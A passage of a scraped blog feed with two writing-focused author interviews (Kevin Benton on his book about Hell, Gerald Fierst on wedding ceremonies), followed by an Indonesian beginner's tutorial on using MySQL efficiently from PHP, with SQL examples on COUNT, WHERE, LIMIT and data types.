<h3 class="post-title entry-title"> <a href="http://thedabblingmum.blogspot.com/2011/05/interview-with-kevin-benton.html">Interview with Kevin Benton</a> </h3><div class="post-header"> </div><div class="separator" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img border="0" src="http://2.bp.blogspot.com/-JTczuSyr8dE/TZFlZnrvzgI/AAAAAAAABFg/h_8fR5PreO8/s1600/KevinBenton.jpg" /></div>Kevin Benton is an inspirational speaker determined to share the message of hope, healing, and hell with all who will listen. His latest book, "<i><a href="http://www.amazon.com/Field-Trip-Hell-Kevin-Benton/dp/1935986058?ie=UTF8&tag=thedabblingmu-20&link_code=btl&camp=213689&creative=392969" target="_blank">A Field Trip To Hell</a><img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=thedabblingmu-20&l=btl&camp=213689&creative=392969&o=1&a=1935986058" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; margin: 0px; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important;" width="1" /></i>", takes the reader into the depths of Hell, exposing them to its 30 revealed torments, while sharing Biblical accounts of Hell in a non-threatening, yet entertaining way.<br />
<br />
<b>What was your path towards publication like?</b><br />
My path towards publication was one of just believing in my manuscript or soon to be book and soliciting it to publishers for publishing consideration. Out of the three publishers that I sent my manuscript to, all three expressed an interest in publishing my book. I felt in my heart that Liberty University Press was the publisher for me because they provided the much needed personal touch that I desired. <br />
<br />
In this business, sometimes your relationship with your publishers can very be impersonal and distant but because I really valued whose hands I placed my manuscript in, Liberty University Press was the unanimous decision. It also helped that Liberty University Press is my Alma matter and I already had a relationship with the people and the school. <br />
<br />
<br />
<b>Can you tell us a little bit about your latest book?</b><br />
My recent book is called "<i><a href="http://www.amazon.com/Field-Trip-Hell-Kevin-Benton/dp/1935986058?ie=UTF8&tag=thedabblingmu-20&link_code=btl&camp=213689&creative=392969" target="_blank">A Field Trip to Hell</a><img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=thedabblingmu-20&l=btl&camp=213689&creative=392969&o=1&a=1935986058" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; margin: 0px; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important;" width="1" /></i>". It is a Christian-fiction book that is, despite the title, very encouraging, inspirational, and informative. <br />
<br />
It is a versatile book with various characteristics to it. Some have even described it as being two books in one. It is autobiographical, doctrine, and theology. It is also Christian-fiction and evangelistic in nature. <br />
<br />
I begin by telling my personal story of experiencing pain and suffering, or what we sometimes classify as going through "hell". In this portion I describe many of the insurmountable odds that I had to overcome to go from the worst basketball player in the playgrounds all the way to the professional basketball ranks. <br />
<br />
One of the trials I had to overcome was being sick to the point of death and the doctors giving me one day to live and the miraculous event that caused me to walk out of the hospital in three days. Afterwards I transition into answering some questions about the ultimate place of pain and suffering…Hell. <br />
<br />
In this part of the book, I answer some of the most widely asked questions about Hell. Next, I take my readers on an actual descriptive field trip, or tour, of Hell and expose them to the 30 revealed torments of hell firsthand. I even explain why there are 30. <br />
<br />
Next I encourage readers to understand that God loves them, which is the true focal point in life. <br />
<br />
<br />
<b>What is your biggest obstacle when it comes to pitching yourself as a writer and what steps have you taken to overcome that obstacle?</b><br />
The biggest obstacle when it comes to pitching myself as a writer is the topic of my book itself. Hell is an avoided and shunned topic and many people will not even venture to find out what the book has to offer simply due to the book's topic. <br />
<br />
I overcame this obstacle by using an elegant looking picture of myself that says “author” and not "devil worshipper". Sometimes people perceive me the wrong way because of the topic of my book so my picture sends a message that I’m just a humble and down to earth guy who wrote a book on the topic of hell. <br />
<br />
To add to this, when I send a pitch about my book, I convey the total message of the book which is surprisingly encouraging, inspirational, and informative. <br />
<br />
Lastly, I let them know that I make a transition to what is deemed the ultimate place of pain and suffering by taking readers on a field trip there, expose them to the 30 revealed torments of Hell firsthand without them having to stay for eternity. After that, they go back home for a lack of a better statement. <br />
<br />
This makes the topic more appealing, less dreaded…as people wonder, "What are the 30 torments of Hell and why 30?" All of which are answered by reading my book.<br />
<br />
<br />
<b>How do you balance your life as a writer with your duties as a parent or spouse?</b><br />
Balance is not only the key but a must because giving birth to a book is almost like having a child, so-to-speak. The hard work begins after publishing the book because it is 90% marketing… which is an ever-turning and sometimes tiresome wheel. <br />
<br />
What works well for me, and my family, is my work schedule. I am a Child Care/Social Worker who works the midnight to eight in the morning shift. When I come home from work my wife is heading to work. When she comes home I’m pretty much done with my work for that day and we are able to spend our quality family time together. Still…Sometimes during the more busy times, you just have to put your work down and for the sake of keeping your priorities in order to make sure that your family comes first. <br />
<br />
<br />
<b>What is your best advice for getting past writer's block?</b><br />
When experiencing writer's block, take a break and go do something that you find relaxing, enjoyable, and fun and then return to your writing with a handy thesaurus next to you to help you through it. If you can find antonyms and synonyms to words that you may want to use, you will eventually find the word that you need or want. In the more severe cases of writers block, you may want to take a day or two hiatus from writing and come back refreshed. <br />
<br />
<br />
<b>What was the best writing-related advice you ever received?</b><br />
When writing, use the technique called "Show and tell". You want to not only just tell what is happening, but describe what is happening. This keeps readers engaged and makes for captivating books… books that once you start reading them, you just can’t seem to put them down. <br />
<br />
There is a plethora of writing-related advice that I have received but his technique has helped me tremendously. It is so rewarding to hear people say, in reference to my book, “Once I started reading your book, I can’t seem to put it down.” <br />
<br />
<br />
<b>What do you feel is the single most detrimental thing a writer could do to destroy his/her career as a writer?</b><br />
In my humble opinion, plagiarism is a detrimental and very quick way to destroy your career. To me, this is the unpardonable sin for all writers. You lose credibility but most of all respect as a writer and as a person. If this label is attached to a writer, it will most likely follow you for the rest of your writing career and it will be very hard to shake. <br />
<br />
<br />
<b>What’s ahead for your writing?</b><br />
To be honest, I’m not sure but I do have some other field trips that I would like to take my readers on. I have an idea about some other concepts but I really have not decided. That the one thing that I like about fictional books is that you can take your readers anywhere you want and it accepted. <br />
<br />
<b>Visit Kevin Benton at <a href="http://www.kevinbentonministries.com/">http://www.kevinbentonministries.com/</a></b><br />
<br />
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.<br />
<br />
This post was sponsored by <i>The Dabbling Mum</i>.<br />
<br />
For more articles geared towards authors and writers, check out <a href="http://thedabblingmum.com/writing/" target="_blank">DM's Writing Center</a>. <div class="linkwithin_text" id="linkwithin_text_1" style="border: 0; font-weight: bold; margin: 0; padding: 20px 0 5px; text-align: left;"> You might also like: </div></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-28013804962336799462011-05-23T02:57:00.002+07:002011-05-23T02:57:15.636+07:00<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
<h3 class="post-title entry-title"> <a href="http://thedabblingmum.blogspot.com/2011/05/interview-with-gerald-fierst.html">Interview with Gerald Fierst</a> </h3><div class="post-header"> </div><div class="separator" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img border="0" src="http://3.bp.blogspot.com/-j-DVIxLR7G4/TZFrIdVbM5I/AAAAAAAABFk/9XoiH0qv89k/s1600/GeraldFierst.jpg" /></div>Gerald Fierst has officiated at wedding celebrations, and performed as a storyteller, throughout the United States. He is author of "<em><a href="http://www.amazon.com/Heart-Wedding-Our-National-Conversation/dp/1935166220?ie=UTF8&tag=thedabblingmu-20&link_code=btl&camp=213689&creative=392969" target="_blank">The Heart of the Wedding</a><img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=thedabblingmu-20&l=btl&camp=213689&creative=392969&o=1&a=1935166220" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; margin: 0px; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important;" width="1" /></em>", a discussion of wedding ceremonies, marriage, and love in 21st Century America.<br />
<br />
<br />
<b>What was your path towards publication like?</b><br />
At one point, I stood in the library and looked at the stacks and thought, “All these people have written books, and some of them have done it more than once.” <br />
<br />
It took five years from the first sample chapters to the final release of my book. I kept on looking at my author’s picture and thinking, “Do I still look like that?” <br />
<br />
I began thinking I would write a stylebook about flowers and food. Some agents expressed an interest but no one bought. Often, I would receive personal, handwritten note, all turning me down and wishing me luck. Then, an acquaintance who had been a publisher and sold the business asked me to do a favor and drive him to Pennsylvania to pick up a new car he had bought. <br />
<br />
On the trip he started to tell me about his new press. <br />
<br />
“Want a book?” I asked. <br />
<br />
“Sure, send me a proposal and I will show it to my editor.” <br />
<br />
So I did. <br />
<br />
At first they, too, were going to pass. “This proposal seems more like your second book. We’d prefer you to write something about issues.” <br />
<br />
Then they called back to say a bird in the hand is worth two in the bush. But by that time I had rethought my proposal and wanted to send the new pitch. They thought this new conceptualization was great and we had a deal. Then I had to write it. Every step was a lesson. You learn how to write a book by writing one. I had written plays and stories but a book needs an arch and a scope that makes you rethink one’s habits. <br />
<br />
<br />
<b>What was the first market you queried and why did you choose that market?</b> <br />
First market was the agents I found in directories. I figured they would help me get the widest possible range of publishers. In fact, they either passed or thought the book was too slight. Part of my problem was I didn’t know how to pitch what I really could do best. Finally, because a publisher knew me and dialogued, I ended up with a much stronger concept and final book.<br />
<br />
<br />
<b>What is your biggest obstacle when it comes to pitching yourself as a writer and what steps have you taken to overcome that obstacle?</b><br />
Pitching is very hard. I like complication. Pitching has to be simple. I try to be unique. Pitching calls for branding and identifying markets. I have learned more about the simple and direct style needed to pitch but I am still learning. You really need a mentor to show you. <br />
<br />
<br />
<b>Can you tell us a little bit about your latest book?</b><br />
My latest book, "<i><a href="http://www.amazon.com/Heart-Wedding-Our-National-Conversation/dp/1935166220?ie=UTF8&tag=thedabblingmu-20&link_code=btl&camp=213689&creative=392969" target="_blank">The Heart of the Wedding</a><img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=thedabblingmu-20&l=btl&camp=213689&creative=392969&o=1&a=1935166220" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; margin: 0px; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important;" width="1" /></i>", has a lot of practical advice about planning a wedding ceremony, but instead of trying to sell product, as so many books and web sites do, I try to sell an idea. <br />
<br />
The words we say are more important than the wine, food or flowers. I give historical context as well as real stories of lovers and their weddings. I discuss the whole concept of marriage in the 21st Century and speak to the debate on marriage in a secular society. Including same-sex weddings, recommitment ceremonies, and partnerships.<br />
<br />
"<i><a href="http://www.amazon.com/Heart-Wedding-Our-National-Conversation/dp/1935166220?ie=UTF8&tag=thedabblingmu-20&link_code=btl&camp=213689&creative=392969" target="_blank">The Heart of the Wedding</a><img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=thedabblingmu-20&l=btl&camp=213689&creative=392969&o=1&a=1935166220" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; margin: 0px; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important;" width="1" /></i>" is non-fiction. Many of the stories I have published are adaptations of folklore. The Heart of the Wedding uses traditional tales to reveal the transformational power of ceremony and uses folktales to frame the true-life stories that parallel the symbolic traditional material stories.<br />
<br />
<b>If you could choose just one thing for your book to accomplish, what would it be?</b><br />
I would like to change the way people marry in the United States so that the first thing they do after they decide to marry is to speak to a civil celebrant about what kind of ceremony they want and then have the celebration reflect the ceremony.<br />
<br />
<br />
<b>How do you balance your life as a writer with your duties as a parent or spouse?</b><br />
I find it hard to work at home and found that I had to go to the library, coffee shop, or the local Christian Science Reading Room (they were great in giving me a quiet comfortable place without any pressure to as to why I was there). When working at home, your family always feels you are available. Phones ring as folks know where you are. You have to stop listening to who is calling and say from this time to that time I am working.<br />
<br />
<br />
<b>What is your best advice for getting past writer's block?</b><br />
Set the timer. Sit and write whatever you can that day in that many hours. Two or three hours was often all I could do, but I wouldn’t do anything else but write and if I got a page finished, I was a page closer to my goal.<br />
<br />
<br />
<b>What was the best writing-related advice you ever received?</b><br />
The best writing advice I received was to make yourself write every day. Get up, go to work, and do as much as you can. I also enjoyed the person who told me that everyone should do three things in life, Raise a child, Plant a Tree, and Write a Book. And the person who told me “Do one thing every day and soon people will start to respond.”<br />
<br />
<br />
<b>What do you feel is the single most detrimental thing a writer could do to destroy his/her career as a writer?</b> <br />
Don’t assume that people don’t want to hear from you. Reach out to everyone big and small. Everyone is looking for ideas and everyone who is good appreciates the struggle. When you stop reaching out, you began to atrophy until you just give up. Having a community energizes; No one accomplishes anything if you don’t put yourself out there to be heard.<br />
<br />
<br />
<b>What’s ahead for your writing?</b><br />
Right now I hope to increase my work with clients writing their ceremonies, but also begin to find new ways to reach out. I still combine theater and writing in my career and will be interested in seeing if some of my true love stories might lead to a fictionalized script.<br />
<br />
<br />
<b>Gerald Fierst can be reached at <a href="http://www.geraldfierst.com/" target="_blank">http://www.geraldfierst.com/</a></b><br />
<br />
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.<br />
<br />
This post was sponsored by <i>The Dabbling Mum</i>.<br />
<br />
For more articles geared towards authors and writers, check out <a href="http://thedabblingmum.com/writing/" target="_blank">DM's Writing Center</a>. </div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-15094470000861081062011-05-23T02:55:00.000+07:002011-05-23T02:55:33.483+07:008 Hal Yang Harus Diketahui Programer Pemula Tentang MySQL<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
<h2 class="title"> <a href="http://buang9.blogspot.com/2011/05/8-hal-yang-harus-diketahui-programer.html">8 Hal Yang Harus Diketahui Programer Pemula Tentang MySQL</a> </h2><span class="date"> Diposkan oleh new </span> <a href="http://indonesia-blogger.com/"><img border="0" height="68" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" width="320" /> </a><br />
<br />
<ol><li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub1"><small>1. Tabel MySQL bukanlah array</small></a> </li>
<li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub2"><small>2. Bahasa SQL dan Fungsi-Fungsi MySQL</small></a> </li>
<li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub3"><small>3. LIMIT, LIMIT, LIMIT</small></a> </li>
<li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub4"><small>4. Tipe Data</small></a> </li>
<li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub5"><small>5. Normalisasi dan Pemodelan</small></a> </li>
<li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub6"><small>6. Indeks</small></a> </li>
<li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub7"><small>7. Konkurensi, Locking, dan Transaksi</small></a> </li>
<li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub8"><small>8. Jenis Tabel</small></a> </li>
<li><a href="http://www.master.web.id/scriptingworld/02-8_hal_mysql/02-8_hal_mysql.html#sub9"><small>Penutup</small></a> </li>
</ol> <br />
<a href="" name="more"></a><br />
<div class="MsoNormal"><i>Time and again I am amazed at how bad the successful software packages out there are. Apache is easily outperformed by fnord, MySQL isn't even a real database, PHP is so slow that Zend actually made a business model out of selling performance enhancing hacks for it.</i>—diary <a href="http://www.advogato.org/person/Fefe/">Fefe</a></div><div class="MsoNormal">PHP+MySQL. Siapa yang tidak tahu bahwa duo sejoli ini adalah pasangan terpopular di dunia open source, bahkan di seluruh Internet. PHP telah menggeser Perl sebagai bahasa pilihan dalam membuat aplikasi Web, terutama bagi pemula. Dan PHP hampir selalu bersanding dengan MySQL; 90–95%+ skrip PHP di <a href="http://www.hotscripts.com/">www.hotscripts.com</a> mungkin bertuliskan “membutuhkan PHP <i>dan</i> MySQL”. Buku-buku PHP, termasuk untuk pemula, tidak akan dipandang afdol kalau belum membahas MySQL. Dan programer PHP, lambat atau cepat, mau atau tidak mau, pasti akan harus mengakrabi software database yang satu ini.</div><div class="MsoNormal">Sayangnya, banyak programer sudah bermain-main dan memakai MySQL secara live di situs produksi, padahal masih asing sama sekali dengan konsep database relasional. Bahkan sebetulnya MySQL juga banyak memiliki kekurangan dalam hal fitur SQL. Sehingga programer PHP tidak bisa memahami dan memanfaatkan kekuatan penuh database relasional + SQL.</div><div class="MsoNormal">Buat Anda para programer pemula yang memang masih awam dengan MySQL dan konsep database pada umumnya, tidak perlu minder atau khawatir. Di dunia IT yang bergerak serba cepat ini memang ada terlalu banyak hal yang harus dipelajari. Dan kebanyakan jadinya dipelajari sambil jalan, sambil dipraktikkan. Ketika mulai membangun CMS untuk satunet.com tahun 1999 pun, saya hanya punya skill terbatas tentang SQL: hanya tahu <tt>SELECT</tt>, <tt>UPDATE</tt>, <tt>DELETE</tt>, <tt>CREATE TABLE</tt>, dan <tt>DROP TABLE</tt>. Apa itu <tt>JOIN</tt>, bagaimana mengubah skema tabel, bagaimana mendesain database yang baik dan ternormalisasi, semuanya masih blank. Dan semua harus dipelajari sambil jalan. Tapi toh akhirnya semua baik-baik saja.</div><div class="MsoNormal">Lewat artikel ini kita akan membahas hal-hal dasar apa yang perlu diketahui agar bisa memakai MySQL dengan efektif dan efisien. Mari kita mulai dengan hal nomor satu:</div><a href="http://buang9.blogspot.com/2011/05/8-hal-yang-harus-diketahui-programer.html" name="sub1"></a><h2>1. Tabel MySQL bukanlah array</h2><div class="Normal-first">Programer PHP atau Perl tentu saja familiar dengan array dan hash, yang biasanya dipakai untuk menyimpan sekumpulan data terkait. Sebagian dari mereka yang tidak familiar dengan MySQL akan cenderung menganalogikan tabel database dengan array/hash (tepatnya, array of array atau array 2 dimensi). Tabel dipandang sama seperti sebuah array, hanya saja bisa berukuran besar sekali dan persisten (disimpan di disk).</div><div class="MsoNormal">Cara pandang ini tidak sepenuhnya salah, karena toh dalam mengambil record dari tabel biasanya ditampung ke dalam variabel array/hash. Hanya saja, cara pandang ini kadang-kadang membuat programer PHP melakukan sesuatu seperti:</div><div class="MsoNormal"><br />
</div><pre style="background-color: #cccccc; color: blue;">$res = mysql_query("SELECT * FROM t1");
$rows = array();
while ($row = mysql_fetch_row($res)) $rows[] = $row;
echo "Jumlah record di tabel t1 = ", count($rows);</pre><pre style="background-color: #cccccc;"> </pre><pre> </pre><pre>atau membuat tabel seperti:</pre><pre style="background-color: #cccccc; color: blue;">CREATE TABLE t2 (
f0 INT UNSIGNED PRIMARY KEY AUTO_INCREMENT,
f1 INT UNSIGNED,
f2 VARCHAR(5),
f3 VARCHAR(200),
f4 VARCHAR(200),
f5 BLOB
);</pre><pre style="color: blue;"> </pre><pre style="color: blue;"> </pre><span style="color: black;">pa yang salah dengan kode PHP pertama di atas, yang bertujuan mencari jumlah record dalam sebuah tabel? Si programer, yang terlalu terobsesi menganggap tabel MySQL sebagai sebuah array, mencoba membangun dulu arraynya dengan mengisi satu-persatu elemen dari hasil query agar nantinya bisa menggunakan fungsi array </span><tt style="color: black;">count()</tt><span style="color: black;">. Masalahnya, bagaimana kalau jumlah record ada 100 ribu? 1 juta? 10 juta? Bukan itu saja, selesai di-</span><tt style="color: black;">count()</tt><span style="color: black;"> variabel </span><tt style="color: black;">$rows</tt><span style="color: black;"> langsung dibuang lagi! Padahal, ada cara yang jauh lebih efisien: </span><pre style="background-color: #cccccc; color: black;">SELECT <b>COUNT(*)</b> FROM t1</pre><div class="MsoNormal" style="color: black;">Hasil querynya hanyalah sebuah record saja, tak peduli berapa pun ukuran tabel <tt>t1</tt>.</div><div class="MsoNormal" style="color: blue;"><span style="color: black;">Lalu apa yang salah dengan kode SQL kedua? Si programer Perl, dalam hal ini, terobsesi ingin mengambil</span> <span style="color: black;">tiap record di tabel dengan fungsi DBI</span> <tt style="background-color: #999999;">$sth->fetchrow_array()<span><span style="background-color: #cccccc;"></span></span></tt></div><div class="MsoNormal" style="color: blue;"><br />
</div><pre style="background-color: #cccccc; color: blue;">@row = $sth->fetchrow_array();
print $row[0]; # f0
print $row[1]; # f1
print $row[2]; # f2
# ...</pre><pre style="color: blue;"> </pre><div class="MsoNormal" style="color: black;">Enak bukan? Elemen ke-0 berisi nilai field <tt>f0</tt>, elemen ke-1 field <tt>f1</tt>, dst. Masalahnya, kemudahan ini mengorbankan nama field yang menjadi sangat tidak deskriptif. Belum lagi kalau tabel perlu diubah dengan menyisipkan field-field lain di antara field yang sudah ada. Atau field-field lama perlu dihapus. Semuanya akan menjadi mimpi buruk.</div><div class="MsoNormal" style="color: black;">Sebagian pembaca mungkin geleng-geleng kepala. Apa benar ada programer PHP dan Perl yang melakukan kedua hal di atas? Percaya deh, ada. Saya pernah harus ketiban getah memaintain tabel dengan nama field kriptik seperti ini.</div><pre style="color: blue;"> </pre><h2 style="color: black;">2. Bahasa SQL dan Fungsi-Fungsi MySQL</h2><div class="Normal-first" style="color: black;">MySQL adalah database SQL bukan? Sayangnya, programer PHP pemula kadang terbatas sekali pengetahuan SQL-nya. Padahal, untuk menggunakan database MySQL dengan efektif, ia tidak boleh malas mempelajari bahasa kedua, yaitu SQL. Jika tidak belajar SQL, maka ada kemungkinan Anda akan melakukan hal-hal seperti:</div><div class="Normal-first" style="color: blue;"><br />
</div><div style="background-color: #cccccc; color: blue;"> $res = mysql_query("SELECT * FROM bigtable");<br />
while ($row = mysql_fetch_assoc($res)) {<br />
if ($row['age'] >= 40) {<br />
echo "Ditemukan kustomer yang berusia lebih dari 40 tahun!\n";<br />
break;<br />
}<br />
}</div><br />
<div class="MsoNormal" style="tab-stops: 36.0pt;">Apa salah kode di atas? Si programer PHP mencoba mensimulasikan klausa <tt>WHERE</tt> SQL dengan melakukan pengujian kondisi di kode PHP. Padahal, yang seharusnya dilakukan adalah:</div><span style="background-color: #cccccc; color: blue;">SELECT * FROM bigtable </span><b style="background-color: #cccccc; color: blue;">WHERE age >= 40</b> <div class="MsoNormal" style="tab-stops: 36.0pt;">Ini amat mengirit trafik client/server karena tidak semua record harus dikirimkan dari MySQL ke program PHP Anda.</div><div class="MsoNormal" style="tab-stops: 36.0pt;">Sebagian pembaca mungkin geleng-geleng kepala. Apa benar ada programer PHP yang seperti ini? Percaya deh, ada.</div><div class="MsoNormal" style="tab-stops: 36.0pt;">SQL sudah menyediakan cara untuk menyortir data, memformat tampilan, mengelompokkan dan memfilter record, dsb. MySQL juga terkenal banyak menyediakan fungsi-fungsi, mulai dari manipulasi tanggal, angka, string, dsb. Kenali SQL dan fungsi-fungsi MySQL; jangan duplikasikan ini semua di PHP sebab akan lebih efisien jika dilakukan di level MySQL.</div><div class="MsoNormal" style="tab-stops: 36.0pt;">Ini contoh lain programer PHP yang tidak memanfaatkan fasilitas dari MySQL:</div><br />
<div style="color: blue;">res = mysql_query("SELECT * FROM customers");<br />
while ($row = mysql_fetch_assoc($res)) {<br />
# format semula yyyy-mm-dd...<br />
preg_match("/(\d\d\d\d)-(\d\d?)-(\d\d?)/", $row[date], $matches); <br />
# ... dan ingin dijadikan dd/mm/yyyy<br />
$tanggal = "$matches[3]/$matches[2]/$matches[1]"; <br />
echo "Nama=$row[name], Tanggal lahir=$tanggal<br>\n";<br />
} </div><div class="MsoNormal" style="tab-stops: 36.0pt;">Padahal MySQL sudah menyediakan fungsi pemformatan dan manipulasi tanggal:</div><span style="color: blue;">$res = mysql_query("SELECT name, </span><b style="color: blue;">DATE_FORMAT</b><span style="color: blue;">(date,'%d-%m-%Y') as tanggal ".</span><br style="color: blue;" /><span style="color: blue;"> "FROM customers");</span><br style="color: blue;" /><span style="color: blue;">while ($row = mysql_fetch_assoc($res)) {</span><br style="color: blue;" /><span style="color: blue;"> # tidak perlu capek-capek manipulasi string lagi...</span><br style="color: blue;" /><span style="color: blue;"> echo "Nama=$row[name], Tanggal lahir=$row[tanggal]<br>\n";</span><br style="color: blue;" /><span style="color: blue;">} </span><div class="MsoNormal" style="tab-stops: 36.0pt;">Poin no. 2 ini kedengarannya klise, tapi, seperti nasihat Inggris bilang: <i>know thy tools</i>.</div><a href="http://buang9.blogspot.com/2011/05/8-hal-yang-harus-diketahui-programer.html" name="sub3"></a><h2>3. LIMIT, LIMIT, LIMIT</h2><div class="Normal-first" style="tab-stops: 36.0pt;">Salah satu alasan mengapa MySQL sangat cocok untuk aplikasi Web adalah mendukung klausa <tt>LIMIT</tt>. Dengan klausa ini, mudah sekali membatasi jumlah record hasil yang diinginkan dalam satu perintah SQL. Tidak perlu bermain kursor atau bersusah payah lewat cara lainnya. Belakangan database lain seperti PostgreSQL dan Firebird pun ikut mendukung fungsionalitas <tt>LIMIT</tt> (dengan sintaks yang tidak persis sama tentunya).</div><div class="MsoNormal" style="tab-stops: 36.0pt;">Sayangnya, programer PHP sendiri yang belum mengenal MySQL dengan baik tidak menggunakannya dengan semestinya.</div><span style="color: blue;">$res = mysql_query("SELECT name FROM users ORDER BY date");</span><br style="color: blue;" /><span style="color: blue;">$rows = array();</span><br style="color: blue;" /><span style="color: blue;">for ($i=1; $i<=10; $i++) $rows[] = mysql_fetch_row($res); </span><div class="MsoNormal" style="tab-stops: 36.0pt;">Si programer hanya berniat mengambil 10 record, tapi menyuruh MySQL mengambil semua record yang ada dulu. Bagaimana kalau ada 100 ribu record? 1 juta record? 10 juta? Seharusnya, setiap kali Anda menginginkan hanya satu, sepuluh, lima belas record, Anda perlu memberitahu MySQL lewat klausa <tt>LIMIT</tt>.</div>SELECT name FROM users ORDER BY date LIMIT 10 <div class="MsoNormal" style="tab-stops: 36.0pt;">Sehingga kita bisa mengirit trafik komunikasi client/server dan mengizinkan MySQL melakukan optimisasi terhadap query tersebut.</div><a href="http://buang9.blogspot.com/2011/05/8-hal-yang-harus-diketahui-programer.html" name="sub4"></a><h2>4. Tipe Data</h2><div class="Normal-first" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Berbeda dengan PHP dan bahasa-bahasa skripting yang mengizinkan kita menaruh apa saja dalam sebuah <tt>$variable</tt> tanpa deklarasi tipe terlebih dahulu, di MySQL kita perlu mendeklarasikan tipe-tipe data semua field yang ada pada saat membuat sebuah tabel. Seorang programer PHP yang tidak kenal MySQL kadang-kadang cenderung memilih jenis data yang salah (umumnya: memilih VARCHAR() padahal ada tipe data yang lebih tepat) dikarenakan tidak mengenal jenis-jenis data yang tersedia.</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Berikut beberapa contoh kurang tepatnya pemilihan tipe data: 1) memilih <tt>CHAR(8)</tt> atau <tt>VARCHAR(10)</tt> dan bukannya <tt>DATE</tt> untuk menyimpan tanggal; kerugiannya, lebih boros tempat dan tidak bisa memanfaatkan fungsi-fungsi khusus tanggal; 2) memilih <tt>CHAR(3)</tt> atau <tt>CHAR(6)</tt> ketimbang <tt>TINYINT UNSIGNED</tt> untuk menyimpan data boolean <span style="color: blue;">(“YES”</span> dan <span style="color: blue;">“NO”;</span> atau <span style="color: blue;">“TRUE”</span> dan <span style="color: blue;">“FALSE”;</span> padahal jauh lebih irit dinyatakan dengan 1 dan 0 yang hanya menempati 1 byte); 3) memilih FLOAT atau DOUBLE dan bukannya DECIMAL untuk menyimpan jumlah uang; kerugiannya, FLOAT dan DOUBLE adalah berbasis biner dan seringkali tidak eksak dalam menyimpan pecahan desimal.</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Nomor 3 sering terjadi karena programer biasanya hanya mengenal single/double floating point number yang tersedia di bahasa pemrograman. Padahal database umumnya menyediakan angka pecahan berbasis desimal yang bisa eksak menyimpan pecahan desimal.</div><div class="MsoNormal" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Manual MySQL amat membantu di sini; di subbab tentang <b>Column Types</b> dijelaskan dengan rinci jenis-jenis data yang ada, termasuk rentang nilai yang dapat ditampung, berapa byte yang ditempati tipe data tersebut, dsb.</div><h2>5. Normalisasi dan Pemodelan</h2><div class="Normal-first" style="tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;">Normalisasi, skema, entiti-atribut, primary key (PK) dan foreign key (FK), tabel entiti, tabel relasi, OLTP & OLAP… semuanya adalah istilah-istilah yang umum dijumpai dalam pemodelan fisik database. Sayangnya, banyak programer pemula tidak memiliki kemampuan modeling. Sehingga jika disuruh mendesain skema database (sekumpulan tabel-tabel beserta nama field dan tipenya) hasilnya tidak optimal bahkan berantakan. Skema yang buruk berakibat terjadinya duplikasi data, tidak scalable, performance yang buruk, tidak memenuhi requirements, dsb.</div><div class="MsoNormal" style="tab-stops: 